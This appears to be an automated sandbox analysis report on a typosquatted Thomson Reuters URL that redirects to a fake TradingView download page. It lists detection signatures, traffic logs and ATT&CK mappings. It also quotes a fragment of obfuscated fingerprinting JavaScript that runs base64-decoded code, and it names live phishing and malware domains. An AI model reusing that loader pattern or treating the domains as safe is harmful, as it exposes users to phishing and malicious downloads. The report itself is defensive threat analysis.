Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://tax.thomson-reuterfiles.com/

Overview

General Information

Sample URL:https://tax.thomson-reuterfiles.com/
Analysis ID:1647531
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains suspicious onload / onerror event
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
HTML body contains low number of good links
HTML page contains hidden javascript code
No HTML title found
Suricata IDS alerts with low severity for network traffic
Suspicious form URL found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,1624719050673582631,1026117326899796759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1568 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-24T23:23:13.563310+010020566432Possible Social Engineering Attempted192.168.2.1649729194.163.44.11443TCP

Joe Sandbox Signatures

  • Phishing
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Persistence and Installation Behavior

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://down.tradingviewdownload.top/dw.php... The script uses the 'Function' constructor to execute dynamically generated code, which is a high-risk indicator of potential malicious behavior. This allows for the execution of arbitrary JavaScript, which could lead to data exfiltration, system compromise, or other harmful actions.
Source: https://tax.thomson-reuterfiles.comJoe Sandbox AI: The URL 'https://tax.thomson-reuterfiles.com' appears to be a typosquatting attempt targeting the well-known brand 'Thomson Reuters'. The legitimate URL is 'https://www.thomsonreuters.com'. The analyzed URL uses a subdomain 'tax' which could be relevant to Thomson Reuters' tax-related services, increasing the likelihood of user confusion. The main domain 'thomson-reuterfiles.com' includes a visual and structural similarity to 'thomsonreuters.com', with the addition of 'files' and the hyphenation of 'reuters' to 'reuterfiles'. This could mislead users into thinking it is a legitimate part of the Thomson Reuters domain, especially in a context related to tax services. The use of a hyphen and the addition of 'files' are common typosquatting techniques to create a deceptive URL. The likelihood of this being a typosquatting attempt is high due to the structural similarity and potential for user confusion.
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: (new function(atob(this.dataset.digest)))();
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: Number of links: 0
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: Base64 decoded: (function(){var e=[],b={};try{function c(a){if("object"===typeof a&&null!==a){var f={};function n(l){try{var k=a[l];switch(typeof k){case "object":if(null===k)break;case "function":k=k.toString()}f[l]=k}catch(t){e.push(t.message)}}for(var d in a)n(d);try{...
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: HTML title missing
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: Form action: https://down.tradingviewdownload.top/dw.php
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: No favicon
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: No <meta name="author".. found
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.238.55.62:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 11MB later: 38MB
Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49729 -> 194.163.44.11:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.67
Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.64.67
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/6c5712a607796dcd.css HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-2555a4296ab7a1b2.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-0c7baedefba6b077.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-49b0a41ec78c7394.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-1e66c022522ffc96.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/849-a4a13dffe91c49e7.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-899e26e961b4ef93.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/search-background-desktop.a9bd8cdc.png HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2 HTTP/1.1Host: app-data.gcs.trstatic.netConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dw.php HTTP/1.1Host: down.tradingviewdownload.topConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /files/images/Logo.png HTTP/1.1Host: down.tradingviewdownload.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://down.tradingviewdownload.top/dw.phpAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _cid=65db891c59864d2eec14acd38d078bd1
Source: global trafficDNS traffic detected: DNS query: tax.thomson-reuterfiles.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: app-data.gcs.trstatic.net
Source: global trafficDNS traffic detected: DNS query: down.tradingviewdownload.top
Source: unknownHTTP traffic detected: POST /dw.php HTTP/1.1Host: down.tradingviewdownload.topConnection: keep-aliveContent-Length: 146389Cache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Origin: https://down.tradingviewdownload.topContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://down.tradingviewdownload.top/dw.phpAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _cid=65db891c59864d2eec14acd38d078bd1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 22:23:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.238.55.62:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6940_1889219146
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6940_1889219146
Source: classification engineClassification label: mal52.phis.win@28/18@23/158
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\c5e73548-dfc2-4f51-b717-82b24c734273.tmp
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,1624719050673582631,1026117326899796759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1568 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,1624719050673582631,1026117326899796759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1568 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\c5e73548-dfc2-4f51-b717-82b24c734273.tmpJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 611739.crdownloadJump to dropped file

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions		1
Process Injection		11
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection		1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://tax.thomson-reuterfiles.com/0%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js0%Avira URL Cloudsafe
https://down.tradingviewdownload.top/files/images/Logo.png0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js0%Avira URL Cloudsafe
